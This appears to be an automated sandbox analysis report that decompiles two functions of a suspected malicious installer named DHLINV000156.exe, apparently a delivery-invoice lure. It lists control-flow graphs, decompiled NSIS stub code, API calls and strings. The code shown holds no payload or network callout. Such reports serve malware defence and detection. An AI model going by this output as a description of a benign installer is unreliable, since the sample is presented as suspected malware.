                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 290 4037f7-40380f call 406372 293 403811-403821 call 405f38 290->293 294 403823-403854 call 405ec1 290->294 302 403877-4038a0 call 403abc call 405a60 293->302 298 403856-403867 call 405ec1 294->298 299 40386c-403872 lstrcatA 294->299 298->299 299->302 308 4038a6-4038ab 302->308 309 403927-40392f call 405a60 302->309 308->309 310 4038ad-4038d1 call 405ec1 308->310 315 403931-403938 call 405ffc 309->315 316 40393d-403962 LoadImageA 309->316 310->309 320 4038d3-4038d5 310->320 315->316 318 4039e3-4039eb call 40140b 316->318 319 403964-403994 RegisterClassA 316->319 333 4039f5-403a00 call 403abc 318->333 334 4039ed-4039f0 318->334 321 403ab2 319->321 322 40399a-4039de SystemParametersInfoA CreateWindowExA 319->322 324 4038e6-4038f2 lstrlenA 320->324 325 4038d7-4038e4 call 40599d 320->325 327 403ab4-403abb 321->327 322->318 328 4038f4-403902 lstrcmpiA 324->328 329 40391a-403922 call 405972 call 405fda 324->329 325->324 328->329 332 403904-40390e GetFileAttributesA 328->332 329->309 336 403910-403912 332->336 337 403914-403915 call 4059b9 332->337 343 403a06-403a20 ShowWindow call 406304 333->343 344 403a89-403a8a call 4051d3 333->344 334->327 336->329 336->337 337->329 351 403a22-403a27 call 406304 343->351 352 403a2c-403a3e GetClassInfoA 343->352 347 403a8f-403a91 344->347 349 403a93-403a99 347->349 350 403aab-403aad call 40140b 347->350 349->334 355 403a9f-403aa6 call 40140b 349->355 350->321 351->352 353 403a40-403a50 GetClassInfoA RegisterClassA 352->353 354 403a56-403a79 DialogBoxParamA call 40140b 352->354 353->354 360 403a7e-403a87 call 403747 354->360 355->334 360->327
                                        C-Code - Quality: 96%
                                        			E004037F7(void* __eflags) {
                                        				intOrPtr _v4;
                                        				intOrPtr _v8;
                                        				int _v12;
                                        				void _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t17;
                                        				void* _t25;
                                        				void* _t27;
                                        				int _t28;
                                        				void* _t31;
                                        				int _t34;
                                        				int _t35;
                                        				intOrPtr _t36;
                                        				int _t39;
                                        				char _t57;
                                        				CHAR* _t59;
                                        				signed char _t63;
                                        				CHAR* _t74;
                                        				intOrPtr _t76;
                                        				CHAR* _t81;
                                        
                                        				_t76 =  *0x423714;
                                        				_t17 = E00406372(2);
                                        				_t84 = _t17;
                                        				if(_t17 == 0) {
                                        					_t74 = 0x41fd08;
                                        					"1033" = 0x30;
                                        					 *0x42a001 = 0x78;
                                        					 *0x42a002 = 0;
                                        					E00405EC1(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fd08, 0);
                                        					__eflags =  *0x41fd08; // 0x53
                                        					if(__eflags == 0) {
                                        						E00405EC1(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407362, 0x41fd08, 0);
                                        					}
                                        					lstrcatA("1033", _t74);
                                        				} else {
                                        					E00405F38("1033",  *_t17() & 0x0000ffff);
                                        				}
                                        				E00403ABC(_t71, _t84);
                                        				_t80 = "C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto";
                                        				 *0x4237a0 =  *0x42371c & 0x00000020;
                                        				 *0x4237bc = 0x10000;
                                        				if(E00405A60(_t84, "C:\\Users\\hardz\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ghetto") != 0) {
                                        					L16:
                                        					if(E00405A60(_t92, _t80) == 0) {
                                        						E00405FFC(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                        					}
                                        					_t25 = LoadImageA( *0x423700, 0x67, 1, 0, 0, 0x8040); // executed
                                        					 *0x422ee8 = _t25;
                                        					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                        						L21:
                                        						if(E0040140B(0) == 0) {
                                        							_t27 = E00403ABC(_t71, __eflags);
                                        							__eflags =  *0x4237c0;
                                        							if( *0x4237c0 != 0) {
                                        								_t28 = E004051D3(_t27, 0);
                                        								__eflags = _t28;
                                        								if(_t28 == 0) {
                                        									E0040140B(1);
                                        									goto L33;
                                        								}
                                        								__eflags =  *0x422ecc; // 0x0
                                        								if(__eflags == 0) {
                                        									E0040140B(2);
                                        								}
                                        								goto L22;
                                        							}
                                        							ShowWindow( *0x41fce8, 5); // executed
                                        							_t34 = E00406304("RichEd20"); // executed
                                        							__eflags = _t34;
                                        							if(_t34 == 0) {
                                        								E00406304("RichEd32");
                                        							}
                                        							_t81 = "RichEdit20A";
                                        							_t35 = GetClassInfoA(0, _t81, 0x422ea0);
                                        							__eflags = _t35;
                                        							if(_t35 == 0) {
                                        								GetClassInfoA(0, "RichEdit", 0x422ea0);
                                        								 *0x422ec4 = _t81;
                                        								RegisterClassA(0x422ea0);
                                        							}
                                        							_t36 =  *0x422ee0; // 0x0
                                        							_t39 = DialogBoxParamA( *0x423700, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B94, 0); // executed
                                        							E00403747(E0040140B(5), 1);
                                        							return _t39;
                                        						}
                                        						L22:
                                        						_t31 = 2;
                                        						return _t31;
                                        					} else {
                                        						_t71 =  *0x423700;
                                        						 *0x422ea4 = E00401000;
                                        						 *0x422eb0 =  *0x423700;
                                        						 *0x422eb4 = _t25;
                                        						 *0x422ec4 = 0x4091f4;
                                        						if(RegisterClassA(0x422ea0) == 0) {
                                        							L33:
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                        						 *0x41fce8 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423700, 0);
                                        						goto L21;
                                        					}
                                        				} else {
                                        					_t71 =  *(_t76 + 0x48);
                                        					_t86 = _t71;
                                        					if(_t71 == 0) {
                                        						goto L16;
                                        					}
                                        					_t74 = 0x4226a0;
                                        					E00405EC1(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423758, 0x4226a0, 0);
                                        					_t57 =  *0x4226a0; // 0x43
                                        					if(_t57 == 0) {
                                        						goto L16;
                                        					}
                                        					if(_t57 == 0x22) {
                                        						_t74 = 0x4226a1;
                                        						 *((char*)(E0040599D(0x4226a1, 0x22))) = 0;
                                        					}
                                        					_t59 = lstrlenA(_t74) + _t74 - 4;
                                        					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                        						L15:
                                        						E00405FDA(_t80, E00405972(_t74));
                                        						goto L16;
                                        					} else {
                                        						_t63 = GetFileAttributesA(_t74);
                                        						if(_t63 == 0xffffffff) {
                                        							L14:
                                        							E004059B9(_t74);
                                        							goto L15;
                                        						}
                                        						_t92 = _t63 & 0x00000010;
                                        						if((_t63 & 0x00000010) != 0) {
                                        							goto L15;
                                        						}
                                        						goto L14;
                                        					}
                                        				}
                                        			}

























                                        0x004037fd
                                        0x00403806
                                        0x0040380d
                                        0x0040380f
                                        0x00403823
                                        0x00403835
                                        0x0040383c
                                        0x00403843
                                        0x00403849
                                        0x0040384e
                                        0x00403854
                                        0x00403867
                                        0x00403867
                                        0x00403872
                                        0x00403811
                                        0x0040381c
                                        0x0040381c
                                        0x00403877
                                        0x00403881
                                        0x0040388a
                                        0x0040388f
                                        0x004038a0
                                        0x00403927
                                        0x0040392f
                                        0x00403938
                                        0x00403938
                                        0x0040394e
                                        0x00403954
                                        0x00403962
                                        0x004039e3
                                        0x004039eb
                                        0x004039f5
                                        0x004039fa
                                        0x00403a00
                                        0x00403a8a
                                        0x00403a8f
                                        0x00403a91
                                        0x00403aad
                                        0x00000000
                                        0x00403aad
                                        0x00403a93
                                        0x00403a99
                                        0x00403aa1
                                        0x00403aa1
                                        0x00000000
                                        0x00403a99
                                        0x00403a0e
                                        0x00403a19
                                        0x00403a1e
                                        0x00403a20
                                        0x00403a27
                                        0x00403a27
                                        0x00403a32
                                        0x00403a3a
                                        0x00403a3c
                                        0x00403a3e
                                        0x00403a47
                                        0x00403a4a
                                        0x00403a50
                                        0x00403a50
                                        0x00403a56
                                        0x00403a6f
                                        0x00403a80
                                        0x00000000
                                        0x00403a85
                                        0x004039ed
                                        0x004039ef
                                        0x00000000
                                        0x00403964
                                        0x00403964
                                        0x00403970
                                        0x0040397a
                                        0x00403980
                                        0x00403985
                                        0x00403994
                                        0x00403ab2
                                        0x00403ab2
                                        0x00000000
                                        0x00403ab2
                                        0x004039a3
                                        0x004039de
                                        0x00000000
                                        0x004039de
                                        0x004038a6
                                        0x004038a6
                                        0x004038a9
                                        0x004038ab
                                        0x00000000
                                        0x00000000
                                        0x004038b5
                                        0x004038c5
                                        0x004038ca
                                        0x004038d1
                                        0x00000000
                                        0x00000000
                                        0x004038d5
                                        0x004038d7
                                        0x004038e4
                                        0x004038e4
                                        0x004038ec
                                        0x004038f2
                                        0x0040391a
                                        0x00403922
                                        0x00000000
                                        0x00403904
                                        0x00403905
                                        0x0040390e
                                        0x00403914
                                        0x00403915
                                        0x00000000
                                        0x00403915
                                        0x00403910
                                        0x00403912
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403912
                                        0x004038f2

                                        APIs
                                          • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                          • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                        • lstrcatA.KERNEL32(1033,Sepad149: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Sepad149: Installing,00000000,00000002,74D0FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHLINV000156.exe",00000000), ref: 00403872
                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto,1033,Sepad149: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Sepad149: Installing,00000000,00000002,74D0FA90), ref: 004038E7
                                        • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto,1033,Sepad149: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Sepad149: Installing,00000000), ref: 004038FA
                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                        • LoadImageA.USER32 ref: 0040394E
                                          • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                        • RegisterClassA.USER32 ref: 0040398B
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039A3
                                        • CreateWindowExA.USER32 ref: 004039D8
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403A0E
                                        • GetClassInfoA.USER32 ref: 00403A3A
                                        • GetClassInfoA.USER32 ref: 00403A47
                                        • RegisterClassA.USER32 ref: 00403A50
                                        • DialogBoxParamA.USER32 ref: 00403A6F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\DHLINV000156.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Sepad149: Installing$_Nb
                                        • API String ID: 1975747703-4138154429
                                        • Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                        • Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
                                        • Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                        • Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b73 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fda call 4059b9 call 405fda GetFileSize 364->368 369 402ff4-402ff8 367->369 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 383 402f47-402f4a 377->383 384 402f9a-402f9f 377->384 381 402e70 379->381 382 402e72-402e7b call 4031d7 379->382 381->382 389 402fa1-402fa9 call 402d60 382->389 390 402e81-402e88 382->390 386 402f4c-402f64 call 4031ed call 4031d7 383->386 387 402f6e-402f98 GlobalAlloc call 4031ed call 402ffb 383->387 384->369 386->384 411 402f66-402f6c 386->411 387->384 415 402fab-402fbc 387->415 389->384 393 402f04-402f08 390->393 394 402e8a-402e9e call 405b2e 390->394 401 402f12-402f18 393->401 402 402f0a-402f11 call 402d60 393->402 394->401 413 402ea0-402ea7 394->413 404 402f27-402f2f 401->404 405 402f1a-402f24 call 406429 401->405 402->401 404->379 414 402f35 404->414 405->404 411->384 411->387 413->401 417 402ea9-402eb0 413->417 414->377 418 402fc4-402fc9 415->418 419 402fbe 415->419 417->401 420 402eb2-402eb9 417->420 421 402fca-402fd0 418->421 419->418 420->401 422 402ebb-402ec2 420->422 421->421 423 402fd2-402fed SetFilePointer call 405b2e 421->423 422->401 424 402ec4-402ee4 422->424 426 402ff2 423->426 424->384 427 402eea-402eee 424->427 426->369 428 402ef0-402ef4 427->428 429 402ef6-402efe 427->429 428->414 428->429 429->401 430 402f00-402f02 429->430 430->401
                                        C-Code - Quality: 80%
                                        			E00402DC4(void* __eflags, signed int _a4) {
                                        				DWORD* _v8;
                                        				DWORD* _v12;
                                        				void* _v16;
                                        				intOrPtr _v20;
                                        				long _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				signed int _v44;
                                        				long _t43;
                                        				signed int _t50;
                                        				void* _t57;
                                        				intOrPtr* _t59;
                                        				long _t60;
                                        				signed int _t65;
                                        				signed int _t70;
                                        				signed int _t71;
                                        				signed int _t77;
                                        				intOrPtr _t80;
                                        				long _t82;
                                        				signed int _t85;
                                        				signed int _t87;
                                        				void* _t89;
                                        				signed int _t90;
                                        				signed int _t93;
                                        				intOrPtr* _t94;
                                        
                                        				_t82 = 0;
                                        				_v12 = 0;
                                        				_v8 = 0;
                                        				_t43 = GetTickCount();
                                        				_t91 = "C:\\Users\\hardz\\Desktop\\DHLINV000156.exe";
                                        				 *0x423710 = _t43 + 0x3e8;
                                        				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\DHLINV000156.exe", 0x400);
                                        				_t89 = E00405B73(_t91, 0x80000000, 3);
                                        				_v16 = _t89;
                                        				 *0x409018 = _t89;
                                        				if(_t89 == 0xffffffff) {
                                        					return "Error launching installer";
                                        				}
                                        				_t92 = "C:\\Users\\hardz\\Desktop";
                                        				E00405FDA("C:\\Users\\hardz\\Desktop", _t91);
                                        				E00405FDA(0x42b000, E004059B9(_t92));
                                        				_t50 = GetFileSize(_t89, 0);
                                        				__eflags = _t50;
                                        				 *0x41e8c4 = _t50;
                                        				_t93 = _t50;
                                        				if(_t50 <= 0) {
                                        					L24:
                                        					E00402D60(1);
                                        					__eflags =  *0x423718 - _t82;
                                        					if( *0x423718 == _t82) {
                                        						goto L29;
                                        					}
                                        					__eflags = _v8 - _t82;
                                        					if(_v8 == _t82) {
                                        						L28:
                                        						_t94 = GlobalAlloc(0x40, _v24);
                                        						E004031ED( *0x423718 + 0x1c);
                                        						_push(_v24);
                                        						_push(_t94);
                                        						_push(_t82);
                                        						_push(0xffffffff); // executed
                                        						_t57 = E00402FFB(); // executed
                                        						__eflags = _t57 - _v24;
                                        						if(_t57 == _v24) {
                                        							__eflags = _v44 & 0x00000001;
                                        							 *0x423714 = _t94;
                                        							 *0x42371c =  *_t94;
                                        							if((_v44 & 0x00000001) != 0) {
                                        								 *0x423720 =  *0x423720 + 1;
                                        								__eflags =  *0x423720;
                                        							}
                                        							_t40 = _t94 + 0x44; // 0x44
                                        							_t59 = _t40;
                                        							_t85 = 8;
                                        							do {
                                        								_t59 = _t59 - 8;
                                        								 *_t59 =  *_t59 + _t94;
                                        								_t85 = _t85 - 1;
                                        								__eflags = _t85;
                                        							} while (_t85 != 0);
                                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                        							 *(_t94 + 0x3c) = _t60;
                                        							E00405B2E(0x423740, _t94 + 4, 0x40);
                                        							__eflags = 0;
                                        							return 0;
                                        						}
                                        						goto L29;
                                        					}
                                        					E004031ED( *0x4128b8);
                                        					_t65 = E004031D7( &_a4, 4);
                                        					__eflags = _t65;
                                        					if(_t65 == 0) {
                                        						goto L29;
                                        					}
                                        					__eflags = _v12 - _a4;
                                        					if(_v12 != _a4) {
                                        						goto L29;
                                        					}
                                        					goto L28;
                                        				} else {
                                        					do {
                                        						_t90 = _t93;
                                        						asm("sbb eax, eax");
                                        						_t70 = ( ~( *0x423718) & 0x00007e00) + 0x200;
                                        						__eflags = _t93 - _t70;
                                        						if(_t93 >= _t70) {
                                        							_t90 = _t70;
                                        						}
                                        						_t71 = E004031D7(0x40a8b8, _t90);
                                        						__eflags = _t71;
                                        						if(_t71 == 0) {
                                        							E00402D60(1);
                                        							L29:
                                        							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                        						}
                                        						__eflags =  *0x423718;
                                        						if( *0x423718 != 0) {
                                        							__eflags = _a4 & 0x00000002;
                                        							if((_a4 & 0x00000002) == 0) {
                                        								E00402D60(0);
                                        							}
                                        							goto L20;
                                        						}
                                        						E00405B2E( &_v44, 0x40a8b8, 0x1c);
                                        						_t77 = _v44;
                                        						__eflags = _t77 & 0xfffffff0;
                                        						if((_t77 & 0xfffffff0) != 0) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v40 - 0xdeadbeef;
                                        						if(_v40 != 0xdeadbeef) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v28 - 0x74736e49;
                                        						if(_v28 != 0x74736e49) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v32 - 0x74666f73;
                                        						if(_v32 != 0x74666f73) {
                                        							goto L20;
                                        						}
                                        						__eflags = _v36 - 0x6c6c754e;
                                        						if(_v36 != 0x6c6c754e) {
                                        							goto L20;
                                        						}
                                        						_a4 = _a4 | _t77;
                                        						_t87 =  *0x4128b8; // 0xc132a
                                        						 *0x4237c0 =  *0x4237c0 | _a4 & 0x00000002;
                                        						_t80 = _v20;
                                        						__eflags = _t80 - _t93;
                                        						 *0x423718 = _t87;
                                        						if(_t80 > _t93) {
                                        							goto L29;
                                        						}
                                        						__eflags = _a4 & 0x00000008;
                                        						if((_a4 & 0x00000008) != 0) {
                                        							L16:
                                        							_v8 = _v8 + 1;
                                        							_t24 = _t80 - 4; // 0x409194
                                        							_t93 = _t24;
                                        							__eflags = _t90 - _t93;
                                        							if(_t90 > _t93) {
                                        								_t90 = _t93;
                                        							}
                                        							goto L20;
                                        						}
                                        						__eflags = _a4 & 0x00000004;
                                        						if((_a4 & 0x00000004) != 0) {
                                        							break;
                                        						}
                                        						goto L16;
                                        						L20:
                                        						__eflags = _t93 -  *0x41e8c4; // 0xc35e0
                                        						if(__eflags < 0) {
                                        							_v12 = E00406429(_v12, 0x40a8b8, _t90);
                                        						}
                                        						 *0x4128b8 =  *0x4128b8 + _t90;
                                        						_t93 = _t93 - _t90;
                                        						__eflags = _t93;
                                        					} while (_t93 != 0);
                                        					_t82 = 0;
                                        					__eflags = 0;
                                        					goto L24;
                                        				}
                                        			}






























                                        0x00402dcc
                                        0x00402dcf
                                        0x00402dd2
                                        0x00402dd5
                                        0x00402ddb
                                        0x00402dec
                                        0x00402df1
                                        0x00402e04
                                        0x00402e09
                                        0x00402e0c
                                        0x00402e12
                                        0x00000000
                                        0x00402e14
                                        0x00402e1f
                                        0x00402e25
                                        0x00402e36
                                        0x00402e3d
                                        0x00402e43
                                        0x00402e45
                                        0x00402e4a
                                        0x00402e4c
                                        0x00402f37
                                        0x00402f39
                                        0x00402f3e
                                        0x00402f45
                                        0x00000000
                                        0x00000000
                                        0x00402f47
                                        0x00402f4a
                                        0x00402f6e
                                        0x00402f79
                                        0x00402f84
                                        0x00402f89
                                        0x00402f8c
                                        0x00402f8d
                                        0x00402f8e
                                        0x00402f90
                                        0x00402f95
                                        0x00402f98
                                        0x00402fab
                                        0x00402faf
                                        0x00402fb7
                                        0x00402fbc
                                        0x00402fbe
                                        0x00402fbe
                                        0x00402fbe
                                        0x00402fc6
                                        0x00402fc6
                                        0x00402fc9
                                        0x00402fca
                                        0x00402fca
                                        0x00402fcd
                                        0x00402fcf
                                        0x00402fcf
                                        0x00402fcf
                                        0x00402fd9
                                        0x00402fdf
                                        0x00402fed
                                        0x00402ff2
                                        0x00000000
                                        0x00402ff2
                                        0x00000000
                                        0x00402f98
                                        0x00402f52
                                        0x00402f5d
                                        0x00402f62
                                        0x00402f64
                                        0x00000000
                                        0x00000000
                                        0x00402f69
                                        0x00402f6c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402e52
                                        0x00402e57
                                        0x00402e5c
                                        0x00402e60
                                        0x00402e67
                                        0x00402e6c
                                        0x00402e6e
                                        0x00402e70
                                        0x00402e70
                                        0x00402e74
                                        0x00402e79
                                        0x00402e7b
                                        0x00402fa3
                                        0x00402f9a
                                        0x00000000
                                        0x00402f9a
                                        0x00402e81
                                        0x00402e88
                                        0x00402f04
                                        0x00402f08
                                        0x00402f0c
                                        0x00402f11
                                        0x00000000
                                        0x00402f08
                                        0x00402e91
                                        0x00402e96
                                        0x00402e99
                                        0x00402e9e
                                        0x00000000
                                        0x00000000
                                        0x00402ea0
                                        0x00402ea7
                                        0x00000000
                                        0x00000000
                                        0x00402ea9
                                        0x00402eb0
                                        0x00000000
                                        0x00000000
                                        0x00402eb2
                                        0x00402eb9
                                        0x00000000
                                        0x00000000
                                        0x00402ebb
                                        0x00402ec2
                                        0x00000000
                                        0x00000000
                                        0x00402ec4
                                        0x00402eca
                                        0x00402ed3
                                        0x00402ed9
                                        0x00402edc
                                        0x00402ede
                                        0x00402ee4
                                        0x00000000
                                        0x00000000
                                        0x00402eea
                                        0x00402eee
                                        0x00402ef6
                                        0x00402ef6
                                        0x00402ef9
                                        0x00402ef9
                                        0x00402efc
                                        0x00402efe
                                        0x00402f00
                                        0x00402f00
                                        0x00000000
                                        0x00402efe
                                        0x00402ef0
                                        0x00402ef4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402f12
                                        0x00402f12
                                        0x00402f18
                                        0x00402f24
                                        0x00402f24
                                        0x00402f27
                                        0x00402f2d
                                        0x00402f2d
                                        0x00402f2d
                                        0x00402f35
                                        0x00402f35
                                        0x00000000
                                        0x00402f35

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402DD5
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DHLINV000156.exe,00000400), ref: 00402DF1
                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\DHLINV000156.exe,80000000,00000003), ref: 00405B77
                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHLINV000156.exe,C:\Users\user\Desktop\DHLINV000156.exe,80000000,00000003), ref: 00402E3D
                                        • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402F73
                                        Strings
                                        • C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
                                        • Null, xrefs: 00402EBB
                                        • Error launching installer, xrefs: 00402E14
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
                                        • Inst, xrefs: 00402EA9
                                        • "C:\Users\user\Desktop\DHLINV000156.exe", xrefs: 00402DC4
                                        • soft, xrefs: 00402EB2
                                        • C:\Users\user\Desktop\DHLINV000156.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\DHLINV000156.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHLINV000156.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-2592694386
                                        • Opcode ID: 52488c0a69c855c3c7aeff43e56c4eb2efc08dbfe116725fd41c71e14f125889
                                        • Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
                                        • Opcode Fuzzy Hash: 52488c0a69c855c3c7aeff43e56c4eb2efc08dbfe116725fd41c71e14f125889
                                        • Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
